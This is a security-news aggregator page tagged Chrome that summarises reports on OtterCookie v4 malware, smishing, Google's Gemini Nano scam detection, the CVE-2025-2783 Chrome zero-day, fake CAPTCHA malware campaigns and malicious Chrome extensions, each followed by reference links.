@securityonline.info
//
The North Korean threat actor WaterPlum, also known as Famous Chollima or PurpleBravo, is behind the latest iteration of the OtterCookie malware, version 4. This cross-platform malware is designed to target financial institutions, cryptocurrency platforms, and FinTech companies across the globe. OtterCookie's evolution demonstrates a significant advancement in its capabilities, posing an increased threat level. The malware is often deployed through the "Contagious Interview" campaign, which uses fake job offers to entice victims into opening malicious payloads.
OtterCookie v4 boasts enhanced credential theft capabilities, with modules specifically designed to steal credentials from Google Chrome, MetaMask, and iCloud Keychain. One module decrypts and extracts passwords from Chrome using the Windows Data Protection API (DPAPI), while another targets the MetaMask extension in browsers like Chrome and Brave, as well as iCloud Keychain, to harvest sensitive data. These stolen credentials are then stored in a local database before being exfiltrated. These advancements represent a significant leap from earlier versions of OtterCookie which primarily functioned as a file grabber.
A key feature of OtterCookie v4 is its ability to detect virtual machine environments, including VMware, VirtualBox, Microsoft Hyper-V, and QEMU. This allows the malware to evade analysis and detection by security researchers and automated sandbox environments. The malware's cross-platform functionality allows it to operate across Windows, macOS, and Linux, significantly broadening its potential impact. Researchers first exposed OtterCookie in December 2024, and the malware has rapidly evolved since then, with version 3 appearing in February 2025 and version 4 in April 2025.
Recommended read:
References :
- MeatMutts: OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities
- Anonymous ???????? :af:: Security’s Masaya Motoda & Rintaro Koike detail the key differences between the OtterCookie malware variants used by WaterPlum (Famous Chollima/PurpleBravo) in November 2024 and in February and April 2025, highlighting their chronological evolution.
- securityonline.info: WaterPlum’s OtterCookie Malware Upgrades to v4 with Credential Theft and Sandbox Detection Features
- Anonymous ???????? :af:: NTT Security - OtterCookie Malware variants by WaterPlum
- Anonymous ???????? :af:: Security’s Masaya Motoda & Rintaro Koike detail the key differences between the OtterCookie malware variants used by WaterPlum (Famous Chollima/PurpleBravo) in November 2024 and in February and April 2025, highlighting their chronological evolution.
- securityonline.info: Information on new malware OtterCookie
@www.webroot.com
//
Cybercriminals are increasingly using sophisticated tactics to deceive individuals and steal sensitive information. One common method involves sending fraudulent text messages, known as smishing, that impersonate legitimate businesses like delivery services or banks. These scams often entice victims to click on malicious links, leading to identity theft, financial loss, or the installation of malware. Webroot emphasizes mobile security, particularly protecting phones from text scams with potential identity theft and malware planting. The Federal Trade Commission reported that consumers lost $470 million to scams initiated through text messages in 2024.
Google is intensifying its efforts to combat these online threats by integrating artificial intelligence across its various platforms. The company is leveraging AI in Search, Chrome, and Android to identify and block scam attempts more effectively. Google's AI-powered defenses are capable of detecting 20 times more scam pages than before, significantly improving the quality of search results. Furthermore, AI is used to identify fraudulent websites, app notifications, calls, and direct messages, helping to safeguard users from various scam tactics.
A key component of Google's enhanced protection is the integration of Gemini Nano, a lightweight, on-device AI model, into Chrome. This allows for instant identification of scams, even those that haven't been previously encountered. When a user navigates to a potentially dangerous page, Chrome evaluates the page using Gemini Nano, which extracts security signals to determine the intent of the page. This information is then sent to Safe Browsing for a final verdict, adding an extra layer of protection against evolving online threats.
Recommended read:
References :
- www.eweek.com: Google is intensifying efforts to combat online scams by integrating artificial intelligence across Search, Chrome, and Android, aiming to make fraud more difficult for cybercriminals.
- www.webroot.com: It all starts so innocently. You get a text saying “Your package couldn’t be delivered. Click here to reschedule.†Little do you know, clicking that link could open the door for scammers to steal your identity, empty your bank account, or even plant malicious software (malware) on your device. Unless you know what to look out
info@thehackernews.com (The@The Hacker News
//
Google is ramping up its AI integration across various platforms to enhance user security and accessibility. The tech giant is deploying AI models in Chrome to detect and block online scams, protecting users from fraudulent websites and suspicious notifications. These AI-powered systems are already proving effective in Google Search, blocking hundreds of millions of scam results daily and significantly reducing fake airline support pages by over 80 percent. Google is also using AI in a new iOS feature called Simplify, which leverages Gemini's large language models to translate dense technical jargon into plain, readable language, making complex information more accessible.
Google's Gemini is also seeing updates in other areas, including new features for simplification and potentially expanded access for younger users. The Simplify feature, accessible via the Google App on iOS, aims to break down technical jargon found in legal contracts or medical reports. Google conducted a study showing improved comprehension among users who read Simplify-processed text, however, the study's limitations highlight the challenges in accurately gauging the full impact of AI-driven simplification. Google's plan to make Gemini available to users under 13 has also sparked concerns among parents and child safety experts, prompting Google to implement parental controls through Family Link and assure that children's activity won't be used to train its AI models.
However, the integration of AI has also presented unforeseen challenges. A recent update to Gemini has inadvertently broken content filters, affecting apps that rely on lowered guardrails, particularly those providing support for trauma survivors. This update has blocked incident reports related to sensitive topics, raising concerns about the limitations and potential biases of AI-driven content moderation. This issue has led to some users, particularly developers who work with apps assisting trauma survivors, to have apps rendered useless due to the changes.
Recommended read:
References :
- bsky.app: Google is implementing a new Chrome security feature that uses the built-in 'Gemini Nano' large-language model (LLM) to detect and block tech support scams while browsing the web.
- PCMag UK security: Google's Chrome Browser Taps On-Device AI to Catch Tech Support Scams
- BleepingComputer: Google Chrome to use on-device AI to detect tech support scams
- thecyberexpress.com: Google is betting on AI
- The Hacker News: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
- techstrong.ai: Google’s Plan to Make Gemini Available to Those Under-13 Is Raising Deep Concerns
- THE DECODER: Google deploys AI in Chrome to detect and block online scams
- eWEEK: Google has rolled out a new iOS feature called Simplify that uses Gemini’s large language models to turn dense technical jargon such as what you would find in legal contracts or medical reports into plain, readable language without sacrificing key details.
- Davey Winder: Mobile malicious, misleading, spammy or scammy — Google fights back against Android attacks with new AI-powered notification protection.
- Malwarebytes: Google announced it will equip Chrome with an AI driven method to detect and block Tech Support Scam websites
- cyberinsider.com: Google plans to introduce a new security feature in Chrome 137 that uses on-device AI to detect tech support scams in real time.
- The DefendOps Diaries: Google Chrome's AI-Powered Defense Against Tech Support Scams
- gbhackers.com: Google Chrome Uses Advanced AI to Combat Sophisticated Online Scams
- security.googleblog.com: Using AI to stop tech support scams in Chrome
- cyberpress.org: Chrome 137 Adds Gemini Nano AI to Combat Tech Support Scams
- The Hacker News: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
- thecyberexpress.com: Google Expands On-Device AI to Counter Evolving Online Scams
- www.eweek.com: Google is intensifying efforts to combat online scams by integrating artificial intelligence across Search, Chrome, and Android, aiming to make fraud more difficult for cybercriminals.
- CyberInsider: Details on Google Chrome for Android deploying on-device AI to tackle tech support scams.
- : discusses Chrome adding on-device AI to detect scams in real time.
- www.ghacks.net: Google integrates local Gemini AI into Chrome browser for scam protection.
- gHacks Technology News: Scam Protection: Google integrates local Gemini AI into Chrome browser
- www.scworld.com: Google to deploy AI-powered scam detection in Chrome
info@thehackernews.com (The@The Hacker News
//
Google is integrating its Gemini Nano AI model into the Chrome browser to provide real-time scam protection for users. This enhancement focuses on identifying and blocking malicious websites and activities as they occur, addressing the challenge posed by scam sites that often exist for only a short period. The integration of Gemini Nano into Chrome's Enhanced Protection mode, available since 2020, allows for the analysis of website content to detect subtle signs of scams, such as misleading pop-ups or deceptive tactics.
When a user visits a potentially dangerous page, Chrome uses Gemini Nano to evaluate security signals and determine the intent of the site. This information is then sent to Safe Browsing for a final assessment. If the page is deemed likely to be a scam, Chrome will display a warning to the user, providing options to unsubscribe from notifications or view the blocked content while also allowing users to override the warning if they believe it's unnecessary. This system is designed to adapt to evolving scam tactics, offering a proactive defense against both known and newly emerging threats.
The AI-powered scam detection system has already demonstrated its effectiveness, reportedly catching 20 times more scam-related pages than previous methods. Google also plans to extend this feature to Chrome on Android devices later this year, further expanding protection to mobile users. This initiative follows criticism regarding Gmail phishing scams that mimic law enforcement, highlighting Google's commitment to improving online security across its platforms and safeguarding users from fraudulent activities.
Recommended read:
References :
- Search Engine Journal: How Google Protects Searchers From Scams: Updates Announced
- www.zdnet.com: How Google's AI combats new scam tactics - and how you can stay one step ahead
- cyberinsider.com: Google plans to introduce a new security feature in Chrome 137 that uses on-device AI to detect tech support scams in real time.
- The Hacker News: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
- The Hacker News: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
- Davey Winder: Google Confirms Android Attack Warnings — Powered By AI
- securityonline.info: Chrome 137 Uses On-Device Gemini Nano AI to Combat Tech Support Scams
- BleepingComputer: Google is implementing a new Chrome security feature that uses the built-in 'Gemini Nano' large-language model (LLM) to detect and block tech support scams while browsing the web. [...]
- The Official Google Blog: How we’re using AI to combat the latest scams
- The Tech Portal: Google to deploy Gemini Nano AI for real-time scam protection in Chrome
- www.tomsguide.com: Google is keeping you safe from scams across search and your smartphone
- www.eweek.com: Google’s Scam-Fighting Efforts Just Got Accelerated, Thanks to AI
- the-decoder.com: Google deploys AI in Chrome to detect and block online scams.
- www.techradar.com: Tired of scams? Google is enlisting AI to protect you in Chrome, Google Search, and on Android.
- Daily CyberSecurity: Chrome 137 Uses On-Device Gemini Nano AI to Combat Tech Support Scams
- PCMag UK security: Google's Chrome Browser Taps On-Device AI to Catch Tech Support Scams
- Analytics India Magazine: Google Chrome to Use AI to Stop Tech Support Scams
- eWEEK: Google’s Scam-Fighting Efforts Just Got Accelerated, Thanks to AI
- THE DECODER: Google is now using AI models to protect Chrome users from online scams. The article appeared first on .
- bsky.app: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
- The Hacker News: Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android
- The DefendOps Diaries: Google Chrome's AI-Powered Defense Against Tech Support Scams
- thecyberexpress.com: Google has released new details on how artificial intelligence (AI) is being used across its platforms to combat a growing wave of online scams. In its latest Fighting Scams in Search report, the company outlines AI-powered systems that are already blocking hundreds of millions of harmful results daily and previews further enhancements being rolled out across Google Search, Chrome, and Android.
- gHacks Technology News: Scam Protection: Google integrates local Gemini AI into Chrome browser
- Malwarebytes: Google Chrome will use AI to block tech support scam websites
- security.googleblog.com: Using AI to stop tech support scams in Chrome
- iHLS: Chrome Adds On-Device AI to Detect Scams in Real Time
- bsky.app: Google will use on-device LLMs to detect potential tech support scams and alert Chrome users to possible dangers
- bsky.app: Google's #AI tools that protect against scammers: https://techcrunch.com/2025/05/08/google-rolls-out-ai-tools-to-protect-chrome-users-against-scams/ #ArtificialIntelligence
- bsky.app: Google will use on-device LLMs to detect potential tech support scams and alert Chrome users to possible dangers
Sergiu Gatlan@BleepingComputer
//
Google has released a critical security update for its Chrome browser to address a high-severity zero-day vulnerability, identified as CVE-2025-2783. This vulnerability was actively exploited in a sophisticated espionage campaign targeting Russian organizations, specifically media companies, educational institutions, and government entities. According to Kaspersky, the vulnerability allowed attackers to bypass Chrome’s sandbox protections, gaining unauthorized access to affected systems without requiring further user interaction. This incident marks the first actively exploited Chrome zero-day since the start of the year, underscoring the persistent threat landscape faced by internet users.
Kaspersky's investigation, dubbed "Operation ForumTroll," revealed that the attacks were initiated through personalized phishing emails disguised as invitations to the "Primakov Readings" forum. Clicking the malicious link led victims to a compromised website that immediately exploited the zero-day vulnerability. The technical sophistication of the exploit chain points to a highly skilled Advanced Persistent Threat (APT) group. Google urges users to update their Chrome browsers immediately to version 134.0.6998.177/.178 for Windows to mitigate the risk.
Recommended read:
References :
- cyberinsider.com: Google has released a security update for Chrome to address a high-severity zero-day vulnerability that was actively exploited in a sophisticated espionage campaign targeting Russian organizations.
- thehackernews.com: Zero-Day Alert: Google Releases Chrome Patch for Exploit Used in Russian Espionage Attacks
- securityaffairs.com: Google fixed the first actively exploited Chrome zero-day since the start of the year
- techcrunch.com: Google fixes Chrome zero-day security flaw used in hacking campaign targeting journalists
- thecyberexpress.com: Google has rolled out a new security update for Chrome users, following the discovery of a vulnerability, CVE-2025-2783, affecting the Windows version of the browser.
- The DefendOps Diaries: Google Chrome Vulnerability CVE-2025-2783: A Closer Look
- Cybernews: Google has patched a dangerous zero-day vulnerability that has already been exploited by sophisticated threat actors in the wild
- Zack Whittaker: New: Google has fixed a zero-day bug in Chrome that was being actively exploited as part of a hacking campaign. Kaspersky says the bug was exploited to target journalists and employees at educational institutions.
- Kaspersky official blog: Kaspersky’s GReAT experts have discovered the Operation ForumTroll APT attack, which used a zero-day vulnerability in Google Chrome.
- bsky.app: Google has fixed a high-severity Chrome zero-day vulnerability exploited to escape the browser's sandbox and deploy malware in espionage attacks targeting Russian organizations.
- Cyber Security News: Operation ForumTroll: APT Hackers Use Chrome Zero-Day to Evade Sandbox Protections.
- www.bleepingcomputer.com: Google has released out-of-band fixes to address a high-severity security flaw in Chrome browser for Windows that has been actively exploited.
- Help Net Security: Help Net Security: Google fixes exploited Chrome sandbox bypass zero-day (CVE-2025-2783)
- securityonline.info: CVE-2025-2783: Chrome Zero-Day Exploited in State-Sponsored Espionage Campaign
- MSSP feed for Latest: Google remediated the high-severity Chrome for Windows zero-day vulnerability.
- The Register - Security: After Chrome patches zero-day used to target Russians, Firefox splats similar bug
- thecyberexpress.com: CISA Issues Urgent Security Alerts: Critical Vulnerabilities in Schneider Electric, Chrome, and Sitecore
- PCMag UK security: Details about Firefox also being affected by Chrome zero-day flaw
- CyberInsider: Firefox Says It’s Vulnerable to Chrome’s Zero-Day Used in Espionage Attacks
- iHLS: Google Patches Dangerous Zero-Day Flaw in Chrome
- PCMag UK security: Time to Patch: Google Chrome Flaw Used to Spread Spyware
- MSPoweruser: Google patches a Chrome zero-day vulnerability used in espionage
- The Hacker News: Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day.
- Blog: Mozilla has released updates to fix a critical security flaw in its Firefox browser for Windows. The vulnerability, designated CVE-2025-2857, stems from improper handling within the browser's inter-process communication (IPC) code, which could allow a compromised child process to gain elevated privileges by manipulating the parent process into returning a powerful handle, potentially leading to sandbox escape.
- techcrunch.com: Mozilla patches Firefox bug ‘exploited in the wild,’ similar to bug attacking Chrome
- securityaffairs.com: Google addressed a critical vulnerability, tracked as CVE-2025-2783, impacting its Chrome browser for Windows.
- securityaffairs.com: U.S. CISA adds Google Chromium Mojo flaw to its Known Exploited Vulnerabilities catalog
- www.scworld.com: Mozilla Patches Firefox Bug Exploited in the Wild, Similar to Chrome Zero-Day
- OODAloop: Firefox Affected by Flaw Similar to Chrome Zero-Day Exploited in Russia
- bsky.app: Google has released out-of-band fixes to address a high-severity security flaw in its Chrome browser for Windows that has been exploited in the wild as part of attacks targeting organizations in Russia.
Andres Ramos@Arctic Wolf
//
A resurgence of a fake CAPTCHA malware campaign has been observed, with threat actors compromising widely used websites across various industries. They are embedding a fake CAPTCHA challenge that redirects victims to a site triggering PowerShell code execution. This campaign exploits social engineering tactics and fake software downloads to deceive users into executing malicious scripts.
This tactic is also utilized with fake captchas which resemble legitimate sites. When users attempt to pass the captcha, they are prompted to execute code that has been copied to their clipboard. The OBSCURE#BAT malware campaign is a major cybersecurity threat to both individuals and organizations, primarily due to its ability to compromise sensitive data through advanced evasion techniques, including API hooking. This allows the malware to hide files and registry entries, making detection difficult.
Recommended read:
References :
- Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
- hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
- Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
- SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
- www.zdnet.com: That weird CAPTCHA could be a malware trap - here's how to protect yourself
- Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
- www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
- : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
- Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users’ clipboards, leading to the installation of information-stealing malware.
- Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
- www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
- gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
- Sucuri Blog: Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
- securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
Aman Mishra@gbhackers.com
//
A recent cybersecurity investigation has uncovered a cluster of 16 malicious Chrome extensions that have compromised at least 3.2 million users. These extensions, which include functionalities like screen capture, ad blocking, and emoji keyboards, were found to inject code into browsers, facilitating advertising and search engine optimization fraud. GitLab's security team discovered these extensions on the official Google Web Store and were used to insert ads and manipulate search engine results.
The malicious extensions operate by checking in with unique configuration servers, transmitting extension versions and hardcoded IDs, and storing configuration data locally. They also create alarms to refresh this data periodically and degrade browser security by stripping Content Security Policy (CSP) protections. Following the discovery, Google was notified, and all identified extensions have been removed from the Chrome Web Store. However, users must manually uninstall these extensions as removal from the store does not trigger automatic uninstalls.
Recommended read:
References :
- bsky.app: GitLab's security team has discovered a cluster of 16 malicious Chrome extensions on the official Google Web Store. The extensions were used to insert ads and manipulate search engine results. Over 3.2 million users downloaded the extensions
- gbhackers.com: A recent cybersecurity investigation has uncovered a cluster of 16 malicious Chrome extensions that have compromised at least 3.2 million users. These extensions, which include functionalities like screen capture, ad blocking, and emoji keyboards, were found to inject code into browsers, facilitating advertising and search engine optimization fraud.
- Cyber Security News: Chrome Under Siege: 16 Malicious Extensions Infect Over 3.2 Million Users
- thecyberexpress.com: Remove These Extensions Now! Hackers Hijack Google Chrome Add-ons for Fraud
@PCWorld
//
Google Chrome has introduced a new layer of security, integrating AI into its existing "Enhanced protection" feature. This update provides real-time defense against dangerous websites, downloads, and browser extensions, marking a significant upgrade to Chrome's security capabilities. The AI integration allows for immediate analysis of patterns, enabling the identification of suspicious webpages that may not yet be classified as malicious.
This AI-powered security feature is an enhancement of Chrome's Safe Browsing. The technology apparently enables real-time analysis of patterns to identify suspicious or dangerous webpages. The improved protection also extends to deep scanning of downloads to detect suspicious files.
Recommended read:
References :
- BleepingComputer: Google Chrome has updated the existing "Enhanced protection" feature with AI to offer "real-time" protection against dangerous websites, downloads and extensions.
- Anonymous ???????? :af:: Google Chrome has updated the existing "Enhanced protection" feature with AI to offer "real-time" protection against dangerous websites, downloads and extensions.
- PCWorld: Google Chrome adds real-time AI protection against dangerous content
|
|
FlagThis - #chrome